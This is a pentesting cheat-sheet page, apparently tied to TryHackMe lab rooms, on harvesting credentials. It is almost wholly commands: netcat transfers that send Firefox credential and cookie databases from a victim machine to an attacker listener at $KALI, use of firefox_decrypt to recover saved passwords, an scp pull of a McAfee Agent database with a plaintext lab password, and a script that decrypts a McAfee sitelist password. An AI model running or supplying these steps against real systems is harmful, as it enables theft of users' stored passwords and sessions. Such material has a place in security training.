Credential Harvesting
Browsers
Firefox
Location
Notes
Example
Decrypt Credentials
Configuration Files
McAfee Agent


Last updated


Last updated
nc -nlvp 1234 > logins.json
nc -nlvp 1234 > key4.db
nc -nlvp 1234 > cert9.db
nc -nlvp 1234 > cookies.sqlitenc64.exe -nv $KALI 1234 < logins.json
nc64.exe -nv $KALI 1234 < key4.db
nc64.exe -nv $KALI 1234 < cert9.db
nc64.exe -nv $KALI 1234 < cookies.sqlitegit clone https://github.com/unode/firefox_decrypt.git
python3.9 firefox_decrypt.py ./cd C:\ProgramData\McAfee\Agent\DBscp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
Password: Password1@sqlitebrowser ma.dbcp /root/Rooms/BreachingAD/task7/mcafeesitelistpwddecryption.zip .
unzip mcafeesitelistpwddecryption.zippython2 mcafee-sitelist-pwd-decryption-master/mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==